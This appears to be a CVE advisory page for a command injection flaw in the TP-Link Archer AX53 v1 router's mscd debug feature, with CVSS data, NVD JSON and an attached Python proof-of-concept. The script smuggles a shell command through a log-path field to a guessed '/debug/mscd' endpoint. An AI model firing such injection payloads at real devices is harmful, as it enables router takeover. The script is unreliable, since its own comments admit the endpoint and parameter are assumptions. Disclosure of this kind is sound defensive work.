Security Vulnerability Report
CVE-2025-15607 CVSS 9.8 CRITICAL

Published: 2026-03-20 17:16:40
Last Modified: 2026-04-02 20:53:51
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

A command injection vulnerability on AX53 v1 occurs in mscd debug functionality due to insufficient input handling, allowing log redirection to arbitrary files and concatenation of unvalidated file content into shell commands, enabling authenticated attackers to inject and execute arbitrary commands. Successful exploitation may allow execution of malicious commands and ultimately full control of the device.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:archer_ax53_firmware:1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:archer_ax53:-:*:*:*:*:*:*:* - NOT VULNERABLE
TP-Link Archer AX53 v1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2025-15607: Command Injection in TP-Link AX53
# This script demonstrates how an attacker might exploit the mscd debug functionality.
# Target: TP-Link Archer AX53 v1


def exploit(target_ip):
    # The vulnerable endpoint is typically a debug interface
    url = f"http://{target_ip}/debug/mscd"

    # Payload injects a command to create a file as proof of execution
    # Based on the description, the input allows log redirection and command concatenation
    # ; or && characters are often used to chain commands in shell injection
    injection_payload = "; touch /tmp/pwned_by_cve_2025_15607"

    # The vulnerable parameter might be related to log file path or debug settings
    # Assuming 'log_path' or similar parameter triggers the vulnerability
    data = {
        "enable_debug": "true",
        "log_redirect": f"/var/log/mscd.log {injection_payload}"
    }

    try:
        print(f"[*] Sending payload to {target_ip}...")
        response = requests.post(url, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if command executed.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")


if __name__ == "__main__":
    # Replace with the actual IP address of the target device
    target = "192.168.0.1"
    exploit(target)
```

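References

https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware (Product)
https://www.tp-link.com/us/support/faq/5025/ (Vendor Advisory)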

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15607", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-20T17:16:40.123", "lastModified": "2026-04-02T20:53:50.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability on AX53 v1 occurs in mscd debug functionality due to insufficient input handling, allowing log redirection to arbitrary files and concatenation of unvalidated file content into shell commands, enabling authenticated attackers to inject and execute arbitrary commands. Successful exploitation may allow execution of malicious commands and ultimately full control of the device."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de comandos en AX53 v1 ocurre en la funcionalidad de depuración de mscd debido a un manejo de entrada insuficiente, permitiendo la redirección de registros a archivos arbitrarios y la concatenación de contenido de archivos no validado en comandos de shell, lo que permite a atacantes autenticados inyectar y ejecutar comandos arbitrarios. 
La explotación exitosa puede permitir la ejecución de comandos maliciosos y, en última instancia, el control total del dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": 
"NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_ax53_firmware:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8C762E60-933C-4B61-84D1-0A6FE4D5E08E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_ax53:-:*:*:*:*:*:*:*", "matchCriteriaId": "394AAF99-8784-4872-8EED-A12B97C575E4"}]}]}], "references": [{"url": "https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/5025/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}]}}